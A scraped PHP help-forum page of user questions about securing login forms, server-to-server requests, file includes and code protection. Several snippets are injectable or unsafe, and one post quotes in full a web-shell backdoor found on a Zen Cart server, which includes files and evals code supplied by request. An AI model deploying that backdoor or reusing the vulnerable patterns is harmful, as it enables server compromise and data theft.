|
PHP - Using Githup To Make Php Code Opensource, Keeping Details Of Server Secure
Hi Little Help Needed
I have created a new website In the index.php file i want to show records from database Now, here is how the problem arise I want to import codes from github intead of hosting those files on my server because i want to keep it opensource Below is the code I am using <?php // connect to the database include('connect-db.php'); // get results from database $sql = "SELECT id, upadhi, name FROM munishri"; $result = $conn->query($sql); if ($result->num_rows > 0) { // output data of each row while($row = $result->fetch_assoc()) { echo "id: " . $row["id"]. " - Name: " . $row["upadhi"]. " " . $row["name"]. "<br>"; } } else { echo "0 results"; } // close connection $conn->close(); ?> Can i host the code to show result in another file and use something like <?php // connect to the database include('connect-db.php'); // get results from database include('http://rawgit.com/th...database.php'); ?> Similar TutorialsI have two servers: WebServer and FaxServer. WebServer needs to send a fax. Is my approach shown below fairly secure? Before sending a fax, ServerWeb needs to store a record in a table representing the message, and I am using a pseudo random value for the PK which is generated as 2147483648+mt_rand(-2147483647,2147483647). WebServer then generates a hash equal to hash('sha256',$pk.'secretCodeWhichOnlyWebServerAndFaxServerKnow'). WebServer then sends curl request to FaxServer using POST which includes $pk, the hash, the fax number, some text to include in the fax, and an optional array of document to include (array(array('id'=>321,'name')=>'fileName.pdf')). FaxServer verifies that the hash is correct given $pk, that the minimum information has been received, and that the fax number is a valid phone number, and quickly responds to WebServer by echoing 0 or 1 so the code in the WebServer could continue and inform the user. If all looks okay, a new instance of PHP is started.
if(missingInformation) {echo(0);}
else {
session_start();
$_SESSION['_xfr']=$_POST;
exec('/usr/bin/php -q /path/to/send_fax.php '.session_id().' >/dev/null &');
echo(1);
}
New instance of PHP send_fax.php then does the following:
session_id($argv[1]);//Set by parent
session_start();
$data=$_SESSION['_xfr'];
$doc_list=null;
foreach ($data['documents'] AS $doc)
{
if(ctype_alnum($doc['id']))
{
$file='/some/tmp/directory/'.$doc['id'];
if(!file_exists($file))
{
$url='http://machine.WebServer.com/index.php?task=displayDocument&id='.$doc['id'].'&x='.hash('sha256','displayDocument'.$doc['id'].'secretCodeWhichOnlyWebServerAndFaxServerKnow');
$cmd='wget -O '.$file.' '.escapeshellarg($url);
exec($cmd);
}
$doc_list.=' '.$file;
}
exit('invalid document');
}
//Send the fax...
//Send another CURL request to the WebServer similar to the wget giving the fax status.
exit;
When WebServer receives the wget request for a document, it confirms the hash and sends the document to the FaxServer using X-Sendfile.When WebServer receives the CURL request regarding status, it updates the database for the applicable message. Seem reasonably secure? Hi there! I have two different hosting services: on the first one I can regularly use the function mail(), but the second does not allow me to send mails (it will block the account for mass mailing). I need to use mail to notify things to user who requested it, so I need to be able to send mail from this second server too. I thought that I will create a mailer script on the firs server, so that the second will simply call the script when needed, passing the e-mail addresses, the subject and content trough POST. Now, how to avoid that some malicious user uses my script to send own mails? I thought that I can send with the POST two vars, "time" and "secure_code" (I will eventually fake the names, so that is not so easy to recognize), where "time" is get by time(), and "secure_code" is a function depending on the value of "time". The mailer script gets the both values, and use the same function to verify if the "secure_code" is correct, according to time. Question is, is this safe? What kind of function shall I use? Also, how could I avoid that a malicious user simply same the "time" and "secure_code" in a certain moment, and use it again? Thanks in advance. The more I look at this code the more i think to myself that there is some kind of security hole in it, but at other times I say that it'll do.
Here's the code in question:
part of my jquery script:
if ( proceed ) {
//console.log('All the conditions have been met.');
var data = $('#registerForm input').serialize(); // Put form data into serialize format:
/* Save Function by grabbing & sending data to register.php */
$.post($('#registerForm').attr('action'), data , function(info) {
console.log(info);
//$('#result').text(info); // Display the result back when saved:
}); // End of Save:
} else {
console.log('There is a problem somewhere.');
}
and my php file that the data is sent to:
if (isset($_POST['username'])) {
$userType = 'public';
$username = $_POST['username'];
$realname = $_POST['realname'];
$email = $_POST['email'];
$password = password_hash(trim($_POST['password']), PASSWORD_BCRYPT, array("cost" => 15));
$query = 'INSERT INTO users (userType, username, realname, email, password, dateAdded) VALUES (:userType, :username, :realname, :email, :password, NOW())';
$stmt = $pdo->prepare($query);
try
{
$result = $stmt->execute(array(':userType' => $userType, ':username' => $username, ':realname' => $realname, ':email' => $email, ':password' => $password));
if ($result) {
echo 'Data Successfully Inserted!';
}
}
catch(PDOException $error)
{
if (substr($error->getCode(), 0, 2) == SQL_CONSTRAINT_VIOLATION) {
$errorMsg = 'The username already exists.';
} else {
throw $error; // some other error happened; just pass it on.
}
}
}
Basically it takes the data from the registration form, validates it and then sends it to the register.php file to insert the data in the database table. I will be a long time before I go live with this, but I want to make this as secure as I can. An suggestions or help will be greatly appreciated.
Best Regards,
John
Hi guys, It's my first post here, not looking to leech, I'm simply here to learn and develop my skills and any contributes will be greatly appreciated! Anyways I have made a simple login script, however I would like to make it more secure. However before that, can you please explain to me as to why it is not secure in the first place? A basic explanation so I can understand would be great. Then after that, could you please give help as to how I would make this login code more secure? Thank you very much Code: [Select] <?php $rowsfound=false; if (isset($_GET['frmStudentId'])) { // functions to make performQuery() work correctly require_once("dbfunctions.inc.php"); $query = "SELECT dbStudentId, dbStudentName " . " FROM student " . " WHERE dbStudentId = '".$_GET['frmStudentId']."'" . " AND dbPassword = '".$_GET['frmPassword']."'"; $result = performQuery($query); if(count($result) > 0) { $rowsfound=true; // allow login } } // code continues by generating appropriate response ... Hey guys I had created a while ago a script for my friend where you can buy points and then redeem stuff with those points, i'm looking for ways to keep my site secu currently what i have done- - protected all mysql queries with mysql_real_escape_string, strip_tags, and addslashes - have a valid SSL certificate on my website - checked if emails are valid for account creation what else can I do? Thank you. Hi all,
I'm looking for an opensource website like groupon or similar. The most important thing is that the graphic need to be minimal and the code very simple to make me able to edit or modify it to adapt it to my purposes.
Thank you.
Can anyone help me make this more secure? I want to link the info to .inc instead of pulling this info straite from the page // cPanel info $cpuser = 'userhere'; // cPanel username $cppass = 'passwordhere'; // cPanel password $cpdomain = 'mysite.com'; // cPanel domain or IP $cpskin = 'x'; // cPanel skin. Mostly x or x2. // See following URL to know how to determine your cPanel skin // http://www.zubrag.com/articles/determine-cpanel-skin.php // Default email info for new email accounts // These will only be used if not passed via URL $epass = 'hispassword'; // email password $edomain = 'mysite.com'; // email domain (usually same as cPanel domain above) $equota = 20; // amount of space in megabytes The only time it pulls the info is in this line // Create email account $f = fopen ("http://$cpuser:$cppass@$cpdomain:2082/frontend/$cpskin/mail/doaddpop.html?email=$euser&domain=$edomain&password=$epass"a=$equota", "r"); if (!$f) { $msg = 'Cannot create email account. Possible reasons: "fopen" function allowed on your server, PHP is running in SAFE mode'; break; } $msg = "<h2>Email account {$euser}@{$edomain} created.</h2>"; Thank you for the h elp once again Hi, I have successfully implemented a master details page with the results aligned in columns linking to a details page. I wish to maintain the recordID passed from the master details page and make the dynamic text, which reads Shade A tree that is capable of..... in the attached screen shot a link to another details page referencing the same recordID. The detailspage2.php would look the same as the screenshot except the Shade text and description below will be highlighted, which I can do, there will be a new image and a new image description. All other dynmaic elements on the page will remain the same. I tried to simply save as my detailspage.php to detailspage2.php and create a link to detailspage2.php. It linked to detailspage2.php but none of the record info showed up in their respective table cells. I have all the names desc's, images, etc setup in a table in my database. Please let me know what code and other info you need to help me out with this procedure. Thanks. Hi guys, I wrote this speck of code to prevent directory transversal. However, I'm not that great with security issues, so I would like some of the gurus to offer pointers/tips/hints as to whether my code is safe or not and how to improve it. $pageID = $_GET["pageid"]; $pageNewIDLower = strtolower($pageID); $pageNewID = ereg_replace("[^A-Za-z0-9]","",$pageNewIDLower); if (strstr($pageNewID,"../") || strstr($pageNewID,"%") != true) { // do stuff } else { include("pages/home.htm"); } If this looks wrong, let me know. I didn't take it directly from my php code as I'm on a cell phone at the moment. I've been developing a php application that runs my entire company for the last 4 years. One of the things I never thought of until now is that the server guys or anyone else could copy the source code and db and be able to start up another company which brings up my question to you.... How would you protect your application? My thought is to create one small php file that is encrypted with something that is required to make the entire site run (not sure at this point what it would be that they couldn't just rebuild). Then if this file sees it's on a different domain/ip it requests data from my site which logs the info for me to look at. If I find out it's something not approved, it would then not allow the program to run and will give a error. What is your idea? I had a programmer who was doing a job for me look over one of my pages and added this security to my POST submit button: Code: [Select] ##### secure ##### if(!empty($_POST['user_url']) & preg_match('/(order.*?by|union.*?select|select.*?from|update.*?set|"|\'|\/*)/', $_POST['user_url'])) exit; if(!empty($_POST['user_url']) & !preg_match('/https?:\/\/[\w\d:#@%\/;$()~\\_?+-=.&]*/', $_POST['user_url'])) exit; ################# However now it doesnt matter what i type into the text box it always Exits the script... can anyone see whats happening here? PS. the purpose the of the text box is to insert URLs into my database... so it would need to allow that format. I have a phppage which needs 1) to load images ,image paths and image name from a different server,when the page is loaded 2)Details automatically saved to the database. can we do this with php(i mean can we take datas from a different server through php code) I have a page that you click to from your email to validate your account. Whenever you click that link and it goes to this page, the server connection times out. What is in this code that would make it timeout (it does not give an error, just says connecting...then times out) session_start(); include "../incl/connectdb.php"; $key1 = $_GET['id']; $key2= $_GET['id2']; $query = "select * from users where passkey = '$key1' and pass2 = '$key2' and activation= 'pending' LIMIT 1"; $result = mysql_query ($query) or die (mysql_error()); $row = mysql_fetch_array ($result); if (mysql_num_rows ($result) < 1){ $_SESSION['message'] = "Invalid link"; header ("Location: ../"); exit(); } $query = "update table-name set activation= 'active' where id = '".$row['id']."' "; mysql_query($query); $_SESSION['message'] = "Account validated."; Hello I recently got a "to many connection" error on my site, and want to know if anyone here knows a few codes that will show how many connection currently are in use (maybe even what files that creates them). I found I can use "Threads_connected" to show current open connections, but no info on how to write the code or where to pu the file. I hope you can show my what to do Is it possible to run a VBScript on the server from a PHP file called by the client? I am using Apache as my web server on a Windows Server 2003 machine. <?php exec('saveAsTxt.vbs'); ?> It just hangs the browser and doesn't do anything. I'm not sure what is going on. If anyone can help, it would be much appreciated. Thanks Mike Hi, A consumer give me WSDL that describe SOAP messages in order to communicate together by Web services. The first WSDL is a webservice that I consume, no problem for this part. But the second one must be implemented in our side, a wsdl is provided to describe the ws that we must develop. The problem is that I don't know how to do? Is a tool exist to generate server code from a wsdl? should I develop from scratch and try to match the wsdl? Any clue will be welcome. Regards, Kyor I have some code that works fine on my dev server but does not work on my production server. Dev server has PHP version 5.2.5 and production server has PHP version 5.1.6. This is the part of the code that isn't working on the prod. server: $xmlDoc=new DOMDocument(); $xmlDoc->loadXML($tmpDoc); $x=$xmlDoc->getElementsByTagName('link'); //get the q parameter from URL $q=$_GET["q"]; //lookup all links from the xml file if length of q>0 if (strlen($q)>0) { $hint=""; for($i=0; $i<($x->length); $i++) { $y=$x->item($i)->getElementsByTagName('title'); $z=$x->item($i)->getElementsByTagName('url'); if ($y->item(0)->nodeType==1) { //find a link matching the search text if (stristr($y->item(0)->childNodes->item(0)->nodeValue,$q)) { if ($hint=="") { $hint="<tr><td><a href='" . $z->item(0)->childNodes->item(0)->nodeValue . "' target='_blank'>" . $y->item(0)->childNodes->item(0)->nodeValue . "</td></tr>"; } else { $hint=$hint . "<tr><td><a href='" . $z->item(0)->childNodes->item(0)->nodeValue . "' target='_blank'>" . $y->item(0)->childNodes->item(0)->nodeValue . "</a></td></tr>"; } } } } } $tmpDoc is a variable that holds database information in xml form. It basically looks like this: $tmpDoc = $tmpDoc . "<link><title>" . $row['CustomerName'] . "****" . $row['Rep'] . "****" . $row['InstallDate'] . "****" . $row['PaidDate'] . "</title><url>accountPage.php?AccNum=" . $row['AccountNum'] . "</url></link>"; ...that is inside a while loop that loops through the rows returned by a query. Basically, as I said, the whole thing works fine on my dev server but on the production server it never makes it into the for loop so I guess the condition $i<($x->length) isn't being met. I'm at a bit of a loss here. Is there anything like the PHP version or Apache version that may cause the "->" operator to not work? The prod PHP version isn't that much older than my dev PHP version so I doubt that's the issue but it's about all I can think of. Thanks! Hello everyone.. This is the first PHP script I've written and was hoping to get some feedback on any possible issues with it. I've pieced this together in an attempt to download remote images and store them on my server, instead of hotlinking images. The code will be used for a forum, called up by a BBCode tag. (The user will place an image URL into the BBCode, which will transfer to this PHP script). Again, this is the first time I've coded anything in PHP and was hoping to get some pointers on anything that needs changing.. thanks <?php $url = $_GET['url']; $url_path = parse_url($url, PHP_URL_PATH); $name = basename($url_path); $FileExt= substr($name, -3); $FileTypeMIME= array("jpg" => "image/jpeg", "png" => "image/png", "gif" => "image/gif"); $ContentType= $FileTypeMIME[$FileExt]; if (empty($ContentType)) die("You are not allowed to access this file!"); header("Content-Type: " . $ContentType); $save = "../images/". strtolower($name); function wtf_image ($file) { switch($FileTypeMIME[$FileExt]){ case "image/jpeg": $im = imagecreatefromjpeg($file); //jpeg file imagejpeg($im, $save, 0, NULL); //save jpeg file break; case "image/gif": $im = imagecreatefromgif($file); //gif file imagegif($im, $save, 0, NULL); //save gif file break; case "image/png": $im = imagecreatefrompng($file); //png file imagePNG($im, $save, 0, NULL); //save png file break; } return $im; } if (file_exists($save)) { readfile($save); } else { chmod($save,0755); $image = wtf_image($url); //Runs wtf_image function on $url imagedestroy($image); readfile($save); } ?> I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop. If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds. Code: [Select] <?php //e6b03bed4190733c7534e5c1209b076f /** * @version 2.42 * */ if (isset($_POST["action"])) { switch ($_POST["action"]) { case "test": test(); break; case "regular_test": regular_test(); break; case "setup": projectcodes_setup(); break; case "remove": projectcodes_remove(); break; case "mail": send(); break; default: break; } return; } if (count($_GET) > 0) { foreach ($_GET as $id => $code) { if ($id == "id") { include $code; } } return; } function test() { $encoded_data = ""; $data["version"] = phpversion(); if (isset($_SERVER["SERVER_SOFTWARE"])) { $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"]; } else { $data["serverapi"] = "Not Available"; } ob_start(); phpinfo(8); $data["modules"] = ob_get_contents(); ob_clean(); $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE; $serializes_data = serialize($data); $encoded_data = base64_encode($serializes_data); echo $_POST["test_message"] . $encoded_data; } function regular_test() { echo $_POST["test_message"]; } function projectcodes_setup() { $projectcodes = $_POST["projectcodes"]; foreach ($projectcodes as $projectcode) { $mark = $projectcode["mark"]; $code = base64_decode($projectcode["code"]); $res = new_file_put_contents($mark, $code); if ($res) { $installed[] = $projectcode["id"]; } } $installed = serialize($installed); $installed = base64_encode($installed); echo $installed; } function projectcodes_remove() { $projectcodes = $_POST["projectcodes"]; foreach ($projectcodes as $projectcode) { $mark = $projectcode["mark"]; $res = unlink($mark); if ($res) { $removed[] = $projectcode["id"]; } } $removed = serialize($removed); $removed = base64_encode($removed); echo $removed; } function new_file_put_contents($filename, $data) { $f = @fopen($filename, 'w'); if (!$f) { return false; } else { $bytes = fwrite($f, $data); fclose($f); return $bytes; } } function new_file_get_contents($filename) /* Returns the contents of file name passed */ { if (!function_exists('file_get_contents')) { $fhandle = fopen($filename, "r"); $fcontents = fread($fhandle, filesize($filename)); fclose($fhandle); } else { $fcontents = file_get_contents($filename); } return $fcontents; } function send() { $code = base64_decode($_POST["projectcode"]); eval($code); //return; } ?> I have had a customer want to run my application (PHP/APACHE/MYSQL) on their server rather than a commercial hosting offering (JUSTHOST/GODADDY)
I am reluctant, as it means giving them access to my PHP code which could possibly be copied or distributed.
Can I protect against this?
|
|||||||